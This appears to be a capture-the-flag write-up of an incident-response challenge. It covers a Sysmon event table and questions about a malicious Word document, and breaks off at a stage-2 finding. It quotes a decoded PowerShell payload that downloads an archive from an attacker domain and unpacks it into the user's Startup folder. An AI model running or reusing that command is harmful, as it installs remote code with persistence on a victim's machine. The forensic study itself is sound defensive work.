Since we are using Sysmon and Wireshark in this Challenge, we will recap first the Sysmon event ID and Some of the Wireshark common filter.
This Wireshark guide is my notes when investigating PCAP challenges on other platforms. And till now, this serves as my guide whenever I encounter PCAP investigation challenges.
| Sysmon Event ID | Description |
|---|---|
| 1 | Process Execution |
| 2 | File Creation Time Changed |
| 3 | Network Connection Detected |
| 11 | File Creation |
| 7 | Image loaded |
| 5 | Process Termination |
| 15 | Sysmon Event ID for file details |
| 13/14 | Registry Modification |
| 19/20 | Logs WMI (Windows Management Instrumentation) activity, often used in advanced attacks. |
| 24 | Clipboard changes. Tracks content copied to the clipboard (useful for spotting data exfiltration). |
| 12 | Registry Creation or Deletion |
| 22 | DNS Query |
In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.
As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:
The user of this machine was compromised by a malicious document. What is the file name of the document?

What is the name of the compromised user and machine?
Format: username-machine name

What is the PID of the Microsoft Word process that opened the malicious document?

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?

What is the base64-encoded string in the malicious payload executed by the document?
Let’s get some information from our previous answer.

$app=[Environment]::GetFolderPath('ApplicationData');cd "$app\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"; iwr <http://phishteam.xyz/02dcf07/update.zip> -outfile update.zip; Expand-Archive .\\update.zip -DestinationPath .; rm update.zip;
What is the CVE number of the exploit used by the attacker to achieve a remote code execution?
Format: XXXX-XXXXX
I dug into the invoked executable files to see if we could find some details.

Based on the initial findings, we discovered that there is a stage 2 execution: